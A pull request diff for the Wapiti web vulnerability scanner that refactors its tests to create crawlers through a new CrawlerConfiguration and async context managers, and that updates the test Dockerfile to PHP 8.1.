### PR TITLE
Refactor AsyncCrawler class with help of a new CrawlerConfiguration

### DIFF
--- a/Dockerfile.test
+++ b/Dockerfile.test
@@ -1,8 +1,10 @@
 FROM ubuntu:latest
 ENV DEBIAN_FRONTEND noninteractive
 RUN apt-get update
-RUN apt-get install python3 python3-pip ca-certificates -y
-RUN apt-get install php7.4-cli php7.4-xml -y --no-install-recommends
+RUN apt-get install ca-certificates -y
+RUN update-ca-certificates
+RUN apt-get install python3 python3-pip -y
+RUN apt-get install php8.1-cli php8.1-xml -y --no-install-recommends
 RUN python3 -c "import sys; print(sys.version)"
 RUN python3 -m pip install --upgrade pip
 RUN pip3 install -U setuptools

--- a/tests/attack/test_mod_crlf.py
+++ b/tests/attack/test_mod_crlf.py
@@ -6,6 +6,7 @@ import httpx
 
 from wapitiCore.net.web import Request
 from wapitiCore.net.crawler import AsyncCrawler
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.language.vulnerability import _
 from wapitiCore.attack.mod_crlf import ModuleCrlf
 from tests import AsyncMock
@@ -25,15 +26,15 @@ async def test_whole_stuff():
     request = Request("http://perdu.com/?a=b&foo=bar")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"), timeout=1)
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleCrlf(crawler, persister, options, Event())
-    module.do_get = True
-    await module.attack(request)
+        module = ModuleCrlf(crawler, persister, options, Event())
+        module.do_get = True
+        await module.attack(request)
 
-    assert persister.add_payload.call_count == 1
-    assert persister.add_payload.call_args_list[0][1]["module"] == "crlf"
-    assert persister.add_payload.call_args_list[0][1]["category"] == _("CRLF Injection")
-    assert persister.add_payload.call_args_list[0][1]["parameter"] == "foo"
-    await crawler.close()
+        assert persister.add_payload.call_count == 1
+        assert persister.add_payload.call_args_list[0][1]["module"] == "crlf"
+        assert persister.add_payload.call_args_list[0][1]["category"] == _("CRLF Injection")
+        assert persister.add_payload.call_args_list[0][1]["parameter"] == "foo"

--- a/tests/attack/test_mod_drupal_enum.py
+++ b/tests/attack/test_mod_drupal_enum.py
@@ -7,6 +7,7 @@ import httpx
 import respx
 import pytest
 
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.web import Request
 from wapitiCore.net.crawler import AsyncCrawler
 from wapitiCore.attack.mod_drupal_enum import ModuleDrupalEnum
@@ -37,16 +38,15 @@ async def test_no_drupal():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2, "tasks": 20}
 
-    options = {"timeout": 10, "level": 2, "tasks": 20}
+        module = ModuleDrupalEnum(crawler, persister, options, Event())
 
-    module = ModuleDrupalEnum(crawler, persister, options, Event())
+        await module.attack(request)
 
-    await module.attack(request)
-
-    assert not persister.add_payload.call_count
-    await crawler.close()
+        assert not persister.add_payload.call_count
 
 
 @pytest.mark.asyncio
@@ -73,26 +73,25 @@ async def test_version_detected():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2, "tasks": 20}
 
-    options = {"timeout": 10, "level": 2, "tasks": 20}
+        module = ModuleDrupalEnum(crawler, persister, options, Event())
 
-    module = ModuleDrupalEnum(crawler, persister, options, Event())
+        await module.attack(request)
 
-    await module.attack(request)
-
-    assert persister.add_payload.call_count == 2
-    assert persister.add_payload.call_args_list[0][1]["module"] == "drupal_enum"
-    assert persister.add_payload.call_args_list[0][1]["category"] == _("Fingerprint web application framework")
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"name": "Drupal", "versions": ["7.67"], "categories": ["CMS Drupal"], "groups": ["Content"]}'
-    )
-    assert persister.add_payload.call_args_list[1][1]["module"] == "drupal_enum"
-    assert persister.add_payload.call_args_list[1][1]["category"] == _("Fingerprint web technology")
-    assert persister.add_payload.call_args_list[1][1]["info"] == (
-        '{"name": "Drupal", "versions": ["7.67"], "categories": ["CMS Drupal"], "groups": ["Content"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count == 2
+        assert persister.add_payload.call_args_list[0][1]["module"] == "drupal_enum"
+        assert persister.add_payload.call_args_list[0][1]["category"] == _("Fingerprint web application framework")
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"name": "Drupal", "versions": ["7.67"], "categories": ["CMS Drupal"], "groups": ["Content"]}'
+        )
+        assert persister.add_payload.call_args_list[1][1]["module"] == "drupal_enum"
+        assert persister.add_payload.call_args_list[1][1]["category"] == _("Fingerprint web technology")
+        assert persister.add_payload.call_args_list[1][1]["info"] == (
+            '{"name": "Drupal", "versions": ["7.67"], "categories": ["CMS Drupal"], "groups": ["Content"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -119,22 +118,21 @@ async def test_multi_versions_detected():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2, "tasks": 20}
 
-    options = {"timeout": 10, "level": 2, "tasks": 20}
+        module = ModuleDrupalEnum(crawler, persister, options, Event())
 
-    module = ModuleDrupalEnum(crawler, persister, options, Event())
+        await module.attack(request)
 
-    await module.attack(request)
-
-    assert persister.add_payload.call_count == 2
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"name": "Drupal", "versions": ["8.0.0-beta4", "8.0.0-beta5", "8.0.0-beta6"], "categories": ["CMS Drupal"], "groups": ["Content"]}'
-    )
-    assert persister.add_payload.call_args_list[1][1]["info"] == (
-        '{"name": "Drupal", "versions": ["8.0.0-beta4", "8.0.0-beta5", "8.0.0-beta6"], "categories": ["CMS Drupal"], "groups": ["Content"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count == 2
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"name": "Drupal", "versions": ["8.0.0-beta4", "8.0.0-beta5", "8.0.0-beta6"], "categories": ["CMS Drupal"], "groups": ["Content"]}'
+        )
+        assert persister.add_payload.call_args_list[1][1]["info"] == (
+            '{"name": "Drupal", "versions": ["8.0.0-beta4", "8.0.0-beta5", "8.0.0-beta6"], "categories": ["CMS Drupal"], "groups": ["Content"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -161,16 +159,15 @@ async def test_version_not_detected():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2, "tasks": 20}
 
-    options = {"timeout": 10, "level": 2, "tasks": 20}
+        module = ModuleDrupalEnum(crawler, persister, options, Event())
 
-    module = ModuleDrupalEnum(crawler, persister, options, Event())
+        await module.attack(request)
 
-    await module.attack(request)
-
-    assert persister.add_payload.call_count == 1
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"name": "Drupal", "versions": [], "categories": ["CMS Drupal"], "groups": ["Content"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count == 1
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"name": "Drupal", "versions": [], "categories": ["CMS Drupal"], "groups": ["Content"]}'
+        )

--- a/tests/attack/test_mod_methods.py
+++ b/tests/attack/test_mod_methods.py
@@ -5,6 +5,7 @@ import httpx
 import respx
 import pytest
 
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.web import Request
 from wapitiCore.net.crawler import AsyncCrawler
 from wapitiCore.attack.mod_methods import ModuleMethods
@@ -38,14 +39,14 @@ async def test_whole_stuff():
     request.set_headers({"content-type": "text/html"})
     all_requests.append(request)
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"), timeout=1)
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleMethods(crawler, persister, options, Event())
-    module.do_get = True
-    for request in all_requests:
-        await module.attack(request)
+        module = ModuleMethods(crawler, persister, options, Event())
+        module.do_get = True
+        for request in all_requests:
+            await module.attack(request)
 
-    assert persister.add_payload.call_count == 1
-    assert "http://perdu.com/dav/" in persister.add_payload.call_args_list[0][1]["info"]
-    await crawler.close()
+        assert persister.add_payload.call_count == 1
+        assert "http://perdu.com/dav/" in persister.add_payload.call_args_list[0][1]["info"]

--- a/tests/attack/test_mod_shellshock.py
+++ b/tests/attack/test_mod_shellshock.py
@@ -6,6 +6,7 @@ import httpx
 import respx
 import pytest
 
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.web import Request
 from wapitiCore.net.crawler import AsyncCrawler
 from wapitiCore.language.vulnerability import _
@@ -44,16 +45,16 @@ async def test_whole_stuff():
     request.set_headers({"content-type": "text/html"})
     all_requests.append(request)
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"), timeout=1)
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleShellshock(crawler, persister, options, Event())
-    module.do_get = True
-    for request in all_requests:
-        await module.attack(request)
+        module = ModuleShellshock(crawler, persister, options, Event())
+        module.do_get = True
+        for request in all_requests:
+            await module.attack(request)
 
-    assert persister.add_payload.call_count == 1
-    assert persister.add_payload.call_args_list[0][1]["module"] == "shellshock"
-    assert persister.add_payload.call_args_list[0][1]["category"] == _("Command execution")
-    assert persister.add_payload.call_args_list[0][1]["request"].url == "http://perdu.com/vuln/"
-    await crawler.close()
+        assert persister.add_payload.call_count == 1
+        assert persister.add_payload.call_args_list[0][1]["module"] == "shellshock"
+        assert persister.add_payload.call_args_list[0][1]["category"] == _("Command execution")
+        assert persister.add_payload.call_args_list[0][1]["request"].url == "http://perdu.com/vuln/"

--- a/tests/attack/test_mod_ssl.py
+++ b/tests/attack/test_mod_ssl.py
@@ -8,6 +8,7 @@ import ssl
 
 import pytest
 
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.web import Request
 from wapitiCore.language.vulnerability import _, CRITICAL_LEVEL, HIGH_LEVEL, INFO_LEVEL
 from wapitiCore.net.crawler import AsyncCrawler
@@ -46,65 +47,64 @@ async def test_ssl_scanner():
     persister = AsyncMock()
     request = Request("https://127.0.0.1:4443/")
     request.path_id = 42
-    crawler = AsyncCrawler(Request("https://127.0.0.1:4443/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("https://127.0.0.1:4443/"), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleSsl(crawler, persister, options, Event())
-    await module.attack(request)
+        module = ModuleSsl(crawler, persister, options, Event())
+        await module.attack(request)
 
-    # Depending on installed python/openssl version different vulnerabilities may be present but the following
-    # vulnerabilities and information should be there everytime
+        # Depending on installed python/openssl version different vulnerabilities may be present but the following
+        # vulnerabilities and information should be there everytime
 
-    persister.add_payload.assert_any_call(
-        request_id=-1,
-        payload_type="additional",
-        module="ssl",
-        category=NAME,
-        level=INFO_LEVEL,
-        request=request,
-        parameter='',
-        wstg=["WSTG-CRYP-01"],
-        info="Certificate subject: yolo.com",
-        response=None
-    )
+        persister.add_payload.assert_any_call(
+            request_id=-1,
+            payload_type="additional",
+            module="ssl",
+            category=NAME,
+            level=INFO_LEVEL,
+            request=request,
+            parameter='',
+            wstg=["WSTG-CRYP-01"],
+            info="Certificate subject: yolo.com",
+            response=None
+        )
 
-    persister.add_payload.assert_any_call(
-        request_id=-1,
-        payload_type="vulnerability",
-        module="ssl",
-        category=NAME,
-        level=CRITICAL_LEVEL,
-        request=request,
-        parameter='',
-        wstg=["WSTG-CRYP-01"],
-        info="Requested hostname doesn't match those in the certificate",
-        response=None
-    )
+        persister.add_payload.assert_any_call(
+            request_id=-1,
+            payload_type="vulnerability",
+            module="ssl",
+            category=NAME,
+            level=CRITICAL_LEVEL,
+            request=request,
+            parameter='',
+            wstg=["WSTG-CRYP-01"],
+            info="Requested hostname doesn't match those in the certificate",
+            response=None
+        )
 
-    persister.add_payload.assert_any_call(
-        request_id=-1,
-        payload_type="vulnerability",
-        module="ssl",
-        category=NAME,
-        level=CRITICAL_LEVEL,
-        request=request,
-        parameter='',
-        wstg=["WSTG-CRYP-01"],
-        info="Certificate is invalid for Mozilla trust store: self signed certificate",
-        response=None
-    )
+        persister.add_payload.assert_any_call(
+            request_id=-1,
+            payload_type="vulnerability",
+            module="ssl",
+            category=NAME,
+            level=CRITICAL_LEVEL,
+            request=request,
+            parameter='',
+            wstg=["WSTG-CRYP-01"],
+            info="Certificate is invalid for Mozilla trust store: self signed certificate",
+            response=None
+        )
 
-    persister.add_payload.assert_any_call(
-        request_id=-1,
-        payload_type="vulnerability",
-        module="ssl",
-        category=NAME,
-        level=HIGH_LEVEL,
-        request=request,
-        parameter='',
-        wstg=["WSTG-CRYP-01"],
-        info="Strict Transport Security (HSTS) is not set",
-        response=None
-    )
-
-    await crawler.close()
+        persister.add_payload.assert_any_call(
+            request_id=-1,
+            payload_type="vulnerability",
+            module="ssl",
+            category=NAME,
+            level=HIGH_LEVEL,
+            request=request,
+            parameter='',
+            wstg=["WSTG-CRYP-01"],
+            info="Strict Transport Security (HSTS) is not set",
+            response=None
+        )

--- a/tests/attack/test_mod_takeover.py
+++ b/tests/attack/test_mod_takeover.py
@@ -8,6 +8,7 @@ import dns
 import dns.message
 import dns.resolver
 
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.web import Request
 from wapitiCore.net.crawler import AsyncCrawler
 from wapitiCore.attack.mod_takeover import ModuleTakeover, TakeoverChecker
@@ -57,18 +58,17 @@ async def test_unregistered_cname():
             request.path_id = 1
             all_requests.append(request)
 
-            crawler = AsyncCrawler(Request("http://perdu.com/"), timeout=1)
-            options = {"timeout": 10, "level": 2}
+            crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"), timeout=1)
+            async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+                options = {"timeout": 10, "level": 2}
 
-            module = ModuleTakeover(crawler, persister, options, Event())
+                module = ModuleTakeover(crawler, persister, options, Event())
 
-            for request in all_requests:
-                await module.attack(request)
+                for request in all_requests:
+                    await module.attack(request)
 
-            assert persister.add_payload.call_args_list[0][1]["request"].hostname == "admin.perdu.com"
-            assert "unregistered.com" in persister.add_payload.call_args_list[0][1]["info"]
-
-            await crawler.close()
+                assert persister.add_payload.call_args_list[0][1]["request"].hostname == "admin.perdu.com"
+                assert "unregistered.com" in persister.add_payload.call_args_list[0][1]["info"]
 
 
 @pytest.mark.asyncio

--- a/tests/attack/test_mod_wapp.py
+++ b/tests/attack/test_mod_wapp.py
@@ -8,6 +8,7 @@ from tests import AsyncMock
 from wapitiCore.attack.mod_wapp import ModuleWapp
 from wapitiCore.language.language import _
 from wapitiCore.net.crawler import AsyncCrawler
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.web import Request
 
 
@@ -34,15 +35,15 @@ async def test_false_positive():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert not persister.add_payload.call_count
-    await crawler.close()
+        assert not persister.add_payload.call_count
 
 
 @pytest.mark.asyncio
@@ -66,20 +67,20 @@ async def test_url_detection():
     request = Request("http://perdu.com/owa/auth/logon.aspx")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count
-    assert persister.add_payload.call_args_list[0][1]["module"] == "wapp"
-    assert persister.add_payload.call_args_list[0][1]["category"] == _("Fingerprint web technology")
-    assert persister.add_payload.call_args_list[2][1]["info"] == (
-        '{"versions": [], "name": "Outlook Web App", "categories": ["Webmail"], "groups": ["Communication"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count
+        assert persister.add_payload.call_args_list[0][1]["module"] == "wapp"
+        assert persister.add_payload.call_args_list[0][1]["category"] == _("Fingerprint web technology")
+        assert persister.add_payload.call_args_list[2][1]["info"] == (
+            '{"versions": [], "name": "Outlook Web App", "categories": ["Webmail"], "groups": ["Communication"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -104,18 +105,18 @@ async def test_html_detection():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"versions": ["2.8.4"], "name": "Atlassian FishEye", "categories": ["Development"], "groups": ["Web development"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"versions": ["2.8.4"], "name": "Atlassian FishEye", "categories": ["Development"], "groups": ["Web development"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -141,18 +142,18 @@ async def test_script_detection():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"versions": ["1.4.2"], "name": "Chart.js", "categories": ["JavaScript graphics"], "groups": ["Web development"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"versions": ["1.4.2"], "name": "Chart.js", "categories": ["JavaScript graphics"], "groups": ["Web development"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -178,18 +179,18 @@ async def test_cookies_detection():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"versions": ["2+"], "name": "CodeIgniter", "categories": ["Web frameworks"], "groups": ["Web development"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"versions": ["2+"], "name": "CodeIgniter", "categories": ["Web frameworks"], "groups": ["Web development"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -215,18 +216,18 @@ async def test_headers_detection():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"versions": ["1.3.4"], "name": "Cherokee", "categories": ["Web servers"], "groups": ["Servers"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"versions": ["1.3.4"], "name": "Cherokee", "categories": ["Web servers"], "groups": ["Servers"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -253,18 +254,18 @@ async def test_meta_detection():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"versions": ["1.6.2"], "name": "Planet", "categories": ["Feed readers"], "groups": ["Content"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"versions": ["1.6.2"], "name": "Planet", "categories": ["Feed readers"], "groups": ["Content"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -293,18 +294,18 @@ async def test_multi_detection():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count
-    assert persister.add_payload.call_args_list[-1][1]["info"] == (
-        '{"versions": ["5.6.1"], "name": "WordPress", "categories": ["CMS", "Blogs"], "groups": ["Content"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count
+        assert persister.add_payload.call_args_list[-1][1]["info"] == (
+            '{"versions": ["5.6.1"], "name": "WordPress", "categories": ["CMS", "Blogs"], "groups": ["Content"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -330,21 +331,21 @@ async def test_implies_detection():
     request = Request("http://perdu.com")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count == 3
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"versions": ["4.5"], "name": "Backdrop", "categories": ["CMS"], "groups": ["Content"]}'
-    )
-    assert persister.add_payload.call_args_list[-1][1]["info"] == (
-        '{"versions": [], "name": "PHP", "categories": ["Programming languages"], "groups": ["Web development"]}'
-    )
-    await crawler.close()
+        assert persister.add_payload.call_count == 3
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"versions": ["4.5"], "name": "Backdrop", "categories": ["CMS"], "groups": ["Content"]}'
+        )
+        assert persister.add_payload.call_args_list[-1][1]["info"] == (
+            '{"versions": [], "name": "PHP", "categories": ["Programming languages"], "groups": ["Web development"]}'
+        )
 
 
 @pytest.mark.asyncio
@@ -370,25 +371,25 @@ async def test_vulnerabilities():
     request = Request("http://perdu.com")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count == 5
-    # FIrst one is an additional
-    assert persister.add_payload.call_args_list[0][1]["info"] == (
-        '{"versions": ["4.5"], "name": "Backdrop", "categories": ["CMS"], "groups": ["Content"]}'
-    )
-    assert persister.add_payload.call_args_list[0][1]["category"] == _("Fingerprint web technology")
+        assert persister.add_payload.call_count == 5
+        # FIrst one is an additional
+        assert persister.add_payload.call_args_list[0][1]["info"] == (
+            '{"versions": ["4.5"], "name": "Backdrop", "categories": ["CMS"], "groups": ["Content"]}'
+        )
+        assert persister.add_payload.call_args_list[0][1]["category"] == _("Fingerprint web technology")
 
-    assert persister.add_payload.call_args_list[3][1]["info"] == (
-        '{"versions": ["1.3.4"], "name": "Cherokee", "categories": ["Web servers"], "groups": ["Servers"]}'
-    )
-    assert persister.add_payload.call_args_list[3][1]["category"] == _('Fingerprint web server')
-    await crawler.close()
+        assert persister.add_payload.call_args_list[3][1]["info"] == (
+            '{"versions": ["1.3.4"], "name": "Cherokee", "categories": ["Web servers"], "groups": ["Servers"]}'
+        )
+        assert persister.add_payload.call_args_list[3][1]["category"] == _('Fingerprint web server')
 
 
 @pytest.mark.asyncio
@@ -425,18 +426,17 @@ async def test_merge_with_and_without_redirection():
     request = Request("http://perdu.com/")
     request.path_id = 1
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"))
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"))
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleWapp(crawler, persister, options, Event())
+        module = ModuleWapp(crawler, persister, options, Event())
 
-    await module.attack(request)
+        await module.attack(request)
 
-    assert persister.add_payload.call_count == 5
+        assert persister.add_payload.call_count == 5
 
-    assert persister.add_payload.call_args_list[3][1]["info"] == (
-        '{"versions": ["15.0.1497", "15.0.1497.26"], "name": "Outlook Web App", "categories": ["Webmail"], "groups": ["Communication"]}'
-    )
-    assert persister.add_payload.call_args_list[3][1]["category"] == _("Fingerprint web application framework")
-
-    await crawler.close()
+        assert persister.add_payload.call_args_list[3][1]["info"] == (
+            '{"versions": ["15.0.1497", "15.0.1497.26"], "name": "Outlook Web App", "categories": ["Webmail"], "groups": ["Communication"]}'
+        )
+        assert persister.add_payload.call_args_list[3][1]["category"] == _("Fingerprint web application framework")

--- a/tests/attack/test_mod_xss_basics.py
+++ b/tests/attack/test_mod_xss_basics.py
@@ -4,6 +4,7 @@ import respx
 import httpx
 import pytest
 
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.web import Request
 from wapitiCore.net.crawler import AsyncCrawler
 from wapitiCore.attack.mod_xss import ModuleXss
@@ -36,13 +37,13 @@ async def test_whole_stuff():
     request.path_id = 3
     all_requests.append(request)
 
-    crawler = AsyncCrawler(Request("http://perdu.com/"), timeout=1)
-    options = {"timeout": 10, "level": 2}
+    crawler_configuration = CrawlerConfiguration(Request("http://perdu.com/"), timeout=1)
+    async with AsyncCrawler.with_configuration(crawler_configuration) as crawler:
+        options = {"timeout": 10, "level": 2}
 
-    module = ModuleXss(crawler, persister, options, Event())
-    module.do_post = True
-    for request in all_requests:
-        await module.attack(request)
+        module = ModuleXss(crawler, persister, options, Event())
+        module.do_post = True
+        for request in all_requests:
+            await module.attack(request)
 
-    assert True
-    await crawler.close()
+        assert True

--- a/tests/cli/test_options.py
+++ b/tests/cli/test_options.py
@@ -24,6 +24,7 @@ async def test_options():
         stop_event = Event()
         cli = Wapiti(Request("http://perdu.com/"), session_dir="/dev/shm")
         cli.persister = CustomMock()
+        cli.crawler = mock.MagicMock()
         cli.set_attack_options({"timeout": 10})
 
         cli.set_modules("-all,xxe")

--- a/tests/cookies/test_json_cookie.py
+++ b/tests/cookies/test_json_cookie.py
@@ -5,6 +5,7 @@ import respx
 import httpx
 import pytest
 
+from wapitiCore.net.crawler_configuration import CrawlerConfiguration
 from wapitiCore.net.jsoncookie import JsonCookie
 from wapitiCore.net.crawler import AsyncCrawler
